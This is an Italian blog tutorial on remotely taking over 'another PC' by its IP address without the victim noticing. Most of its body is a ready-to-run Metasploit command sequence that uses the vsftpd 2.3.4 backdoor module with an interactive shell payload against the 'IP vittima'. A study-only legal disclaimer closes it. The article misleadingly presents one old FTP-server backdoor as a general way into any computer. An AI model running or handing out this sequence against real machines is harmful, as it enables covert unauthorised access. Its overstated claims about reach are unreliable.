Abbiamo analizzato vari metodi per sviluppare o creare backdoor e oggi andremo ad approfondire su come entrare in un altro PC conoscendo l’indirizzo IP. Infatti, come abbiamo avuto modo di vedere già altre volte, l’attaccante per portare a termine l’apertura di una backdoor o il compimento di qualsiasi altro tipo di attacco, quasi sempre si avvale dell’IP del target; infatti l’indirizzo IP (oppure chiamato ipv4) serve a identificarci all’interno di una rete e per questo racchiude in se una serie di importantissime informazioni sul nostro dispositivo e sulla nostra connessione. Può essere utile a rintracciarci e a volte entrare nei nostri PC e telefoni per capire chi siamo, cosa facciamo e ottenere altri svariati dati e informazioni. Mediante una serie di passaggi, vi illustrerò uno dei tantissimi modi per riuscire a trovare una falla di sicurezza all’interno di un PC e riuscire a evadere i sistemi di protezione per controllarlo da remoto, senza che la vittima se ne accorga; ovviamente ricordo sempre che se volete testare ciò, dovete farlo esclusivamente sui vostri dispositivi e non danneggiare quelli altrui. Partiamo! Come primo passaggio apriamo un terminale e digitiamo il comando “service postgresql start”

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

Dopo aver digitato questo comando potremo procedere con gli altri procedimenti; innanzitutto avviamo la console Metasploit Framework:

-msfconsole

 

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

-use exploit/unix/ftp/vsftpd_234_backdoor

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

-set RHOST “IP vittima”

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

 

-set PAYLOAD cmd/unix/interact

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

-exploit

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

-A questo punto metasploit dovrebbe riuscire ad aprire una sessione con il computer di cui avete inserito l’indirizzo IP; potete come sempre venire a conoscenza dei comandi mediante il comando help, che elencherà tutte le azioni che potete eseguire da remoto sul PC target.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.